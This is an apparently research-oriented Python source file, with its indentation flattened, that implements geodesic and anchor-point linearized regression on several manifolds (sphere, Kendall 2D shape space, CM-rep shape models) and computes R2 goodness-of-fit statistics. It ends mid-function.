def GeodesicRegression_CMRep( t_list, pt_list, max_iter = 500, stepSize = 0.01, step_tol = 1e-8, verbose=True ):
nManDim = pt_list[ 0 ].nDim
base = manifolds.cmrep( nManDim )
tangent = manifolds.cmrep_tVec( nManDim )
nData = len( pt_list )
for i in range( nManDim ):
pt_list_pos_i = []
pt_list_rad_i = []
for j in range( nData ):
pt_list_pos_i.append( pt_list[ j ].pt[ i ][ 0 ] )
pt_list_rad_i.append( pt_list[ j ].pt[ i ][ 1 ] )
t_list_pos_i = list( t_list )
t_list_rad_i = list( t_list )
print( t_list_pos_i )
base_pos_i, tangent_pos_i = GeodesicRegression( t_list_pos_i, pt_list_pos_i, max_iter, stepSize, step_tol, False )
base_rad_i, tangent_rad_i = GeodesicRegression( t_list_rad_i, pt_list_rad_i, max_iter, 1e-3, step_tol, True )
base.SetPosition( i, base_pos_i.pt )
base.SetRadius( i, base_rad_i.pt )
tangent.SetPositionTangentVector( i, tangent_pos_i.tVector )
tangent.SetRadiusTangentVector( i, tangent_rad_i.tVector )
return base, tangent
def GeodesicRegression_CMRep_Abstract( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, verbose=True ):
nManDim = pt_list[ 0 ].nDim
base = manifolds.cmrep_abstract( nManDim )
tangent = manifolds.cmrep_abstract_tVec( nManDim )
nData = len( pt_list )
base_pt_arr = []
tangent_tVec_arr = []
for i in range( 4 ):
pt_list_i = []
t_list_i = list( t_list )
for j in range( nData ):
pt_list_i.append( pt_list[ j ].pt[ i ] )
base_i, tangent_i = GeodesicRegression( t_list_i, pt_list_i, max_iter, stepSize, step_tol, verbose )
base_pt_arr.append( base_i )
tangent_tVec_arr.append( tangent_i )
base.SetPoint( base_pt_arr )
tangent.SetTangentVector( tangent_tVec_arr )
base.UpdateMeanRadius()
return base, tangent
def GeodesicRegression_Scale_Kendall2D( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, verbose=True ):
nManDim = pt_list[ 0 ].nPt
base = manifolds.scale_kendall2D( nManDim )
tangent = manifolds.scale_kendall2D_tVec( nManDim )
nData = len( pt_list )
base_pt_arr = []
tangent_tVec_arr = []
for i in range( 2 ):
pt_list_i = []
t_list_i = list( t_list )
for j in range( nData ):
pt_list_i.append( pt_list[ j ].pt[ i ] )
base_i, tangent_i = GeodesicRegression( t_list_i, pt_list_i, max_iter, stepSize, step_tol, verbose )
base_pt_arr.append( base_i )
tangent_tVec_arr.append( tangent_i )
base.SetPoint( base_pt_arr )
tangent.SetTangentVector( tangent_tVec_arr )
return base, tangent
#############################################################################
### Anchor Point Linearized Geodesic Regression ###
#############################################################################
def LinearizedGeodesicRegression( t_list, pt_list, max_iter = 500, stepSize = 0.05, step_tol = 0.01, useFrechetMeanAnchor = False, verbose=False ):
if pt_list[ 0 ].Type == "Sphere":
return LinearizedGeodesicRegression_Sphere( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "Kendall2D":
return LinearizedGeodesicRegression_Kendall2D( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "PositiveReal":
return LinearizedGeodesicRegression_PosReal( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "Euclidean":
return LinearizedGeodesicRegression_Euclidean( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "CMRep":
return LinearizedGeodesicRegression_CMRep( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "CMRep_Abstract":
return LinearizedGeodesicRegression_CMRep_Abstract( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "CMRep_Abstract_Normal":
return LinearizedGeodesicRegression_CMRep_Abstract_Normal( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "Scale_Kendall2D":
return LinearizedGeodesicRegression_Scale_Kendall2D( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
else:
print( "Manifold type is not known" )
return -1
def LinearizedGeodesicRegression_Sphere( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nData = len( pt_list )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
# Initialize an anchor point
if useFrechetMeanAnchor:
p_anchor = FrechetMean( pt_list )
else:
t_min_idx = np.argmin( t_list )
p_anchor = pt_list[ t_min_idx ]
nManifoldDim = p_anchor.nDim
# Initial point on manifold and tangent vector
init_Interp = manifolds.sphere( nManifoldDim )
init_tVec = manifolds.sphere_tVec( nManifoldDim )
base = init_Interp
tangent = init_tVec
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prevTangent = tangent
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( pt_list[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
estModel_list = []
for d in range( nManifoldDim ):
t_list_sm = sm.add_constant( t_list )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, t_list_sm )
est_d = LS_model_d.fit(method='qr')
# est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
v_tangent_on_p_anchor = manifolds.sphere_tVec( nManifoldDim )
v_to_base_on_p_anchor = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 1 ]
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
print( "Anchor point to base" )
print( v_to_base_on_p_anchor.tVector )
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
newTangent = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor )
energy = 0
for n in range( nData ):
time_pt = t_list[ n ]
target = pt_list[ n ]
current_tangent = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
current_tangent.tVector[ d ] = newTangent.tVector[ d ] * time_pt
estimate_n = newBase.ExponentialMap( current_tangent )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print ( energy )
print( "=========================" )
break
else:
prevBase = newBase
prevTangent = newTangent
p_anchor = newBase
base = newBase
tangent = newTangent
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent
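# Usage sketch: the anchor-point scheme above maps the data into the tangent space at
# p_anchor with LogMap, fits per-coordinate OLS w_d( t ) = a_d + b_d * t with statsmodels,
# then maps the intercept back with ExponentialMap and parallel-translates the slope to the
# new base point. t_list / pt_list are assumed to be time stamps and sphere points.
def _example_linearized_regression_sphere( t_list, pt_list ):
    return LinearizedGeodesicRegression( t_list, pt_list, max_iter = 50, verbose = False )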
def LinearizedGeodesicRegression_Kendall2D( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nData = len( pt_list )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
# Initialize an anchor point
if useFrechetMeanAnchor:
p_anchor = FrechetMean( pt_list )
else:
t_min_idx = np.argmin( t_list )
p_anchor = pt_list[ t_min_idx ]
nManifoldDim = p_anchor.nPt
# Initial point on manifold and tangent vector
init_Interp = manifolds.kendall2D( nManifoldDim )
init_tVec = manifolds.kendall2D_tVec( nManifoldDim )
base = init_Interp
tangent = init_tVec
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prevTangent = tangent
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
for k in range( 2 ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( pt_list[ j ] )
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list[ k * nManifoldDim + d ].append( tVec_j.tVector[k, d] )
estModel_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
t_list_sm = sm.add_constant( t_list )
w_d_np = np.asarray( w_list[ k * nManifoldDim + d ] )
LS_model_d = sm.OLS( w_d_np, t_list_sm )
est_d = LS_model_d.fit(method='qr')
# est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
v_tangent_on_p_anchor = manifolds.kendall2D_tVec( nManifoldDim )
v_to_base_on_p_anchor = manifolds.kendall2D_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ 0, d ] = estModel_list[ d ].params[ 0 ]
v_to_base_on_p_anchor.tVector[ 1, d ] = estModel_list[ nManifoldDim + d ].params[ 0 ]
if len( estModel_list[ d ].params ) < 2:
v_tangent_on_p_anchor.tVector[ 0, d ] = 0
else:
v_tangent_on_p_anchor.tVector[ 0, d ] = estModel_list[ d ].params[ 1 ]
if len( estModel_list[ nManifoldDim + d ].params ) < 2:
v_tangent_on_p_anchor.tVector[ 1, d ] = 0
else:
v_tangent_on_p_anchor.tVector[ 1, d ] = estModel_list[ nManifoldDim + d ].params[ 1 ]
# print( "Anchor point to base" )
# print( v_to_base_on_p_anchor.tVector )
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
newTangent = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor )
energy = 0
for n in range( nData ):
time_pt = t_list[ n ]
target = pt_list[ n ]
current_tangent = manifolds.kendall2D_tVec( nManifoldDim )
for k in range( 2 ):
for d in range( nManifoldDim ):
current_tangent.tVector[ k, d ] = newTangent.tVector[ k, d ] * time_pt
estimate_n = newBase.ExponentialMap( current_tangent )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print ( energy )
print( "=========================" )
break
else:
prevBase = newBase
prevTangent = newTangent
p_anchor = newBase
base = newBase
tangent = newTangent
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent
def LinearizedGeodesicRegression_PosReal( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nData = len( pt_list )
if verbose:
print( "======================================================" )
print( " Data on Anchor Point Tangent Vector Space " )
print( "======================================================" )
# Initialize an anchor point
if useFrechetMeanAnchor:
p_anchor = FrechetMean( pt_list )
else:
p_anchor = pt_list[ 0 ]
nManifoldDim = p_anchor.nDim
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( pt_list[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
estModel_list = []
for d in range( nManifoldDim ):
t_list_sm = sm.add_constant( t_list )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, t_list_sm )
est_d = LS_model_d.fit(method='qr')
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
v_tangent_on_p_anchor = manifolds.pos_real_tVec( nManifoldDim )
v_to_base_on_p_anchor = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 1 ]
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
base = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
tangent = p_anchor.ParallelTranslateAtoB( p_anchor, base, v_tangent_on_p_anchor )
p_anchor = base
return base, tangent
def LinearizedGeodesicRegression_Euclidean( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nData = len( pt_list )
if verbose:
print( "======================================================" )
print( " Data on Anchor Point Tangent Vector Space " )
print( "======================================================" )
# Initialize an anchor point
if useFrechetMeanAnchor:
p_anchor = FrechetMean( pt_list )
else:
t_min_idx = np.argmin( t_list )
p_anchor = pt_list[ t_min_idx ]
nManifoldDim = p_anchor.nDim
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( pt_list[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
estModel_list = []
for d in range( nManifoldDim ):
t_list_sm = sm.add_constant( t_list )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, t_list_sm )
est_d = LS_model_d.fit(method='qr')
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
v_tangent_on_p_anchor = manifolds.euclidean_tVec( nManifoldDim )
v_to_base_on_p_anchor = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 1 ]
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
base = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
tangent = p_anchor.ParallelTranslateAtoB( p_anchor, base, v_tangent_on_p_anchor )
p_anchor = base
return base, tangent
def LinearizedGeodesicRegression_CMRep( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nManDim = pt_list[ 0 ].nDim
base = manifolds.cmrep( nManDim )
tangent = manifolds.cmrep_tVec( nManDim )
nData = len( pt_list )
for i in range( nManDim ):
pt_list_pos_i = []
pt_list_rad_i = []
for j in range( nData ):
pt_list_pos_i.append( pt_list[ j ].pt[ i ][ 0 ] )
pt_list_rad_i.append( pt_list[ j ].pt[ i ][ 1 ] )
t_list_pos_i = list( t_list )
t_list_rad_i = list( t_list )
base_pos_i, tangent_pos_i = LinearizedGeodesicRegression( t_list_pos_i, pt_list_pos_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, False )
base_rad_i, tangent_rad_i = LinearizedGeodesicRegression( t_list_rad_i, pt_list_rad_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, False )
base.SetPosition( i, base_pos_i.pt )
base.SetRadius( i, base_rad_i.pt )
tangent.SetPositionTangentVector( i, tangent_pos_i.tVector )
tangent.SetRadiusTangentVector( i, tangent_rad_i.tVector )
return base, tangent
def LinearizedGeodesicRegression_CMRep_Abstract( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nManDim = pt_list[ 0 ].nDim
base = manifolds.cmrep_abstract( nManDim )
tangent = manifolds.cmrep_abstract_tVec( nManDim )
nData = len( pt_list )
base_pt_arr = []
tangent_tVec_arr = []
for i in range( 4 ):
pt_list_i = []
t_list_i = list( t_list )
for j in range( nData ):
pt_list_i.append( pt_list[ j ].pt[ i ] )
base_i, tangent_i = LinearizedGeodesicRegression( t_list_i, pt_list_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
base_pt_arr.append( base_i )
tangent_tVec_arr.append( tangent_i )
base.SetPoint( base_pt_arr )
tangent.SetTangentVector( tangent_tVec_arr )
base.UpdateMeanRadius()
return base, tangent
def LinearizedGeodesicRegression_CMRep_Abstract_Normal( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nManDim = pt_list[ 0 ].nDim
base = manifolds.cmrep_abstract_normal( nManDim )
tangent = manifolds.cmrep_abstract_normal_tVec( nManDim )
nData = len( pt_list )
base_pt_arr = []
tangent_tVec_arr = []
for i in range( 4 ):
pt_list_i = []
t_list_i = list( t_list )
for j in range( nData ):
pt_list_i.append( pt_list[ j ].pt[ i ] )
base_i, tangent_i = LinearizedGeodesicRegression( t_list_i, pt_list_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
base_pt_arr.append( base_i )
tangent_tVec_arr.append( tangent_i )
base_normal1_arr = []
base_normal2_arr = []
tangent_normal1_arr = []
tangent_normal2_arr = []
for i in range( nManDim ):
pt_normal1_list_i = []
pt_normal2_list_i = []
t_list1_i = list( t_list )
t_list2_i = list( t_list )
for j in range( nData ):
pt_normal1_list_i.append( pt_list[ j ].pt[ 4 ][ i ] )
pt_normal2_list_i.append( pt_list[ j ].pt[ 5 ][ i ] )
base_normal1_i, tangent_normal1_i = LinearizedGeodesicRegression( t_list1_i, pt_normal1_list_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
base_normal2_i, tangent_normal2_i = LinearizedGeodesicRegression( t_list2_i, pt_normal2_list_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
base_normal1_arr.append( base_normal1_i )
base_normal2_arr.append( base_normal2_i )
tangent_normal1_arr.append( tangent_normal1_i )
tangent_normal2_arr.append( tangent_normal2_i )
base_pt_arr.append( base_normal1_arr )
base_pt_arr.append( base_normal2_arr )
tangent_tVec_arr.append( tangent_normal1_arr )
tangent_tVec_arr.append( tangent_normal2_arr )
base.SetPoint( base_pt_arr )
tangent.SetTangentVector( tangent_tVec_arr )
base.UpdateMeanRadius()
return base, tangent
def LinearizedGeodesicRegression_Scale_Kendall2D( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nManDim = pt_list[ 0 ].nPt
base = manifolds.scale_kendall2D( nManDim )
tangent = manifolds.scale_kendall2D_tVec( nManDim )
nData = len( pt_list )
base_pt_arr = []
tangent_tVec_arr = []
for i in range( 2 ):
pt_list_i = []
t_list_i = list( t_list )
for j in range( nData ):
pt_list_i.append( pt_list[ j ].pt[ i ] )
base_i, tangent_i = LinearizedGeodesicRegression( t_list_i, pt_list_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
base_pt_arr.append( base_i )
tangent_tVec_arr.append( tangent_i )
base.SetPoint( base_pt_arr )
tangent.SetTangentVector( tangent_tVec_arr )
return base, tangent
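# Usage sketch for the 2D Kendall shape-and-scale regression (hypothetical variable names;
# assumes `kendall_shape_list` holds manifolds.scale_kendall2D objects observed at `t_list`):
#   base, tangent = LinearizedGeodesicRegression_Scale_Kendall2D( t_list, kendall_shape_list,
#                                                                 verbose = False )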
####################################################################
### Statistical Validations ###
####################################################################
# R2 Statistics
def R2Statistics( t_list, pt_list, base, tangent ):
if base.Type == "Sphere":
return R2Statistics_Sphere( t_list, pt_list, base, tangent )
elif base.Type == "PositiveReal":
return R2Statistics_PosReal( t_list, pt_list, base, tangent )
elif base.Type == "Euclidean":
return R2Statistics_Euclidean( t_list, pt_list, base, tangent )
elif base.Type == "CMRep":
return R2Statistics_CMRep( t_list, pt_list, base, tangent )
elif base.Type == "CMRep_Abstract":
return R2Statistics_CMRep_Abstract( t_list, pt_list, base, tangent )
else:
print( "Manifold Type Unknown" )
return -1
def R2Statistics_Mu( t_list, pt_list, base, tangent, mu ):
if base.Type == "Sphere":
return R2Statistics_Mu_Sphere( t_list, pt_list, base, tangent, mu )
elif base.Type == "PositiveReal":
return R2Statistics_Mu_PosReal( t_list, pt_list, base, tangent, mu )
elif base.Type == "Euclidean":
return R2Statistics_Mu_Euclidean( t_list, pt_list, base, tangent, mu )
# elif base.Type == "CMRep":
# return R2Statistics_CMRep( t_list, pt_list, base, tangent, mu )
# elif base.Type == "CMRep_Abstract":
# return R2Statistics_CMRep_Abstract( t_list, pt_list, base, tangent, mu )
else:
print( "Manifold Type Unknown" )
return -1
def R2Statistics_Sphere( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
mu = FrechetMean( pt_list )
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t estimated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
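# The statistic above is the geodesic analogue of R^2:
#   R^2 = 1 - Var( data | estimated geodesic ) / Var( data | Frechet mean ),
# where both variances are mean squared geodesic (log-map) distances.
# For example, var_est = 0.02 and var_mu = 0.08 give R^2 = 1 - 0.25 = 0.75.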
def R2Statistics_Mu_Sphere( t_list, pt_list, base, tangent, mu ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
# mu = FrechetMean( pt_list )
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t estimated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
def R2Statistics_PosReal( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
mu = FrechetMean( pt_list )
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t estimated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
def R2Statistics_Mu_PosReal( t_list, pt_list, base, tangent, mu ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
# mu = FrechetMean( pt_list )
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t estimated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
def R2Statistics_Euclidean( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
mu = FrechetMean( pt_list )
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t estimated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
def R2Statistics_Mu_Euclidean( t_list, pt_list, base, tangent, mu ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
# mu = FrechetMean( pt_list )
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t estimated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
def R2Statistics_CMRep( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
mu = FrechetMean( pt_list )
mu.UpdateMeanRadius()
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
tVec_mu_to_y_i.SetMeanRadius( mu.meanRadius )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t estimated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.cmrep_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ][ 0 ].tVector[ 0 ] = ( tangent.tVector[ d ][ 0 ].tVector[ 0 ] * t_i )
tVec_at_t_i.tVector[ d ][ 0 ].tVector[ 1 ] = ( tangent.tVector[ d ][ 0 ].tVector[ 1 ] * t_i )
tVec_at_t_i.tVector[ d ][ 0 ].tVector[ 2 ] = ( tangent.tVector[ d ][ 0 ].tVector[ 2 ] * t_i )
tVec_at_t_i.tVector[ d ][ 1 ].tVector[ 0 ] = ( tangent.tVector[ d ][ 1 ].tVector[ 0 ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
est_pt_at_t_i.UpdateMeanRadius()
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
tVec_est_to_y_i.SetMeanRadius( est_pt_at_t_i.meanRadius )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
def R2Statistics_CMRep_Abstract( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
print( "Calculating Frechet Mean... " )
mu = FrechetMean( pt_list )
mu.UpdateMeanRadius()
var_mu = 0
print( "Calculating Variance..." )
mean_area_s = 0
mean_radius = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
tVec_mu_to_y_i.SetMeanRadius( mu.meanRadius )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
mean_area_s += ( pt_list[ i ].pt[ 1 ].pt[ 0 ] / float( nData ) )
pt_list[ i ].UpdateMeanRadius()
mean_radius += ( pt_list[ i ].meanRadius / float( nData ) )
print( "Data Variance w.r.t Frechet Mean" )
print( var_mu )
# Explained Variance w.r.t estimated geodesic
print( "Calculating Variance w.r.t Estimated....")
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = tangent.ScalarMultiply( t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
est_pt_at_t_i.UpdateMeanRadius()
est_pt_at_t_i.SetMeanScale( np.sqrt( mean_area_s ) * (1.0 / 3.0 ) )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
tVec_est_to_y_i.SetMeanRadius( mean_radius )
tVec_est_to_y_i.SetMeanScale( np.sqrt( mean_area_s ) * (1.0 / 3.0 ) )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
print( "Data Variance w.r.t Estimated Trend" )
print( var_est )
return R2
def R2Statistics_CMRep_Abstract_Array( t_list, pt_list, base, tangent ):
nObject = len( pt_list )
nData = len( pt_list[0] )
nManifoldDim = pt_list[0][ 0 ].nDim
var_mu = 0
var_est = 0
for n in range( nObject ):
mean_area_s = 0
mean_radius = 0
for i in range( nData ):
